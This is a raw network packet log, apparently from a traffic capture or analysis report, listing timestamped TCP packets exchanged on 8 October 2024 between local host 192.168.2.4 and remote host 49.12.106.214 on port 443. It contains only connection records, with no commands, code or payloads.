                                                                                                                Oct 8, 2024 05:00:01.028687954 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.028757095 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.028769970 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.029090881 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.042006016 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.042017937 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.042112112 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.042145014 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.045010090 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.051239967 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.051254034 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.051316977 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.051330090 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.052645922 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.061780930 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.061793089 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.061861038 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.061873913 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.065516949 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.070878029 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.070889950 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.070951939 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.070962906 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.073122978 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.078380108 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.078392982 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.078453064 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.078464031 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.080703974 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.087404013 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.087418079 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.087487936 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.087507010 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.088289022 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.099174023 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.099188089 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.099277973 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.099339008 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.101108074 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.113683939 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.113697052 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.113884926 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.113946915 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.114008904 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.128506899 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.128520012 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.128590107 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.128604889 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.129282951 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.140228987 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.140240908 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.140316963 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.140330076 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.141206026 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.149015903 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.149028063 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.149120092 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.149132013 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.150487900 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.159744024 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.159801960 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.159831047 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.159845114 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.159876108 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.159898996 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.166825056 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.166881084 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.166913986 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.166924953 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.166954041 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.166975021 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.175489902 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.175537109 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.175574064 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.175587893 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.175617933 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.175637960 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.186436892 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.186485052 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.186501980 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.186513901 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.186543941 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.186563969 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.206429958 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.206473112 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.206515074 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.206526041 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.206559896 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.206559896 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.221174002 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.221216917 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.221256971 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.221281052 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.221302986 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.221323013 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.233166933 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.233217955 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.233266115 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.233278036 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.233303070 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.233321905 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.254256964 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.254342079 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.254642963 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.254703999 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.254975080 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.275082111 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.275130033 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.275288105 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.275288105 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.275351048 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.275433064 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.278937101 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.278987885 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.279026985 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.279047012 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.279071093 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.279088020 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.286766052 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.286806107 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.286861897 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.286873102 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.286899090 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.286916018 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.290941000 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.290980101 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.291023016 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.291033983 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.291059017 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.291076899 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.312802076 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.312858105 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.313036919 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.313036919 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.313101053 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.316868067 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.329399109 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.329440117 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.329478025 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.329492092 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.329519033 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.329540014 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.337357998 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.337397099 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.337435961 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.337446928 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.337475061 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.337491989 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.357083082 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.357142925 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.357172966 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.357189894 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.357215881 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.357235909 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.378582954 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.378631115 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.378665924 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.378676891 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.378700972 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.378720045 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.379772902 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.379812002 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.379847050 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.379857063 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.379882097 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.379899979 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.380918980 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.380956888 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.380987883 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.380997896 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.381022930 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.381042004 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.398827076 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.398865938 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.398901939 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.398914099 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.398942947 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.398961067 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.414839029 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.414881945 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.415024996 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.415024996 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.415090084 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.415366888 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.422940016 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.422992945 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.423032045 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.423048019 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.423077106 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.423156977 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.433274984 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.433315992 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.433351040 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.433362961 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.433388948 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.433410883 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.468435049 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.468476057 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.468632936 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.468632936 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.468646049 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.469404936 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.470758915 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.470798016 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.470839024 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.470876932 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.470911980 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.471529007 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.471576929 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.471604109 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.471617937 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.471643925 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.472664118 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.472703934 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.472735882 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.472749949 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.472778082 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.473649025 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.491302013 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.491343021 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.491398096 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.491421938 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.491446018 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.491720915 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.506977081 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.506995916 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.507283926 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.507298946 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.507375002 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.515055895 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.515073061 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.515260935 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.515324116 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.515408039 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.525654078 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.525736094 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.525770903 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.525785923 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.525928020 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.528970957 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.560687065 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.560730934 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.560883999 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.560883999 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.560947895 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.561001062 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.563088894 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.563127995 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.563165903 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.563184023 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.563208103 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.563872099 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.563918114 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.563941002 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.563952923 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.563983917 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.564001083 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.565012932 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.565051079 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.565082073 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.565099001 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.565123081 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.565140009 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.583538055 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.583636045 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.583698988 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.583698988 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.583714962 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.584923029 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.599370003 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.599410057 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.599570990 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.599571943 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.599634886 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.599694967 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.607563019 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.607583046 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.607645988 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.607666016 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.609066963 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.617958069 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.617978096 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.618036032 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.618047953 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.620893002 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.653090000 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.653137922 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.653332949 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.653394938 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.653459072 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.655663013 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.655705929 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.655750990 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.655765057 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.655793905 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.655816078 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.656404972 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.656456947 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.656482935 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.656495094 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.656519890 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.656537056 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.657275915 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.657376051 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.657406092 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.657417059 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.657439947 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.657459021 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.676047087 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.676095963 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.676134109 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.676146030 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.676172018 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.676191092 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.691916943 CEST4434977549.12.106.214192.168.2.4
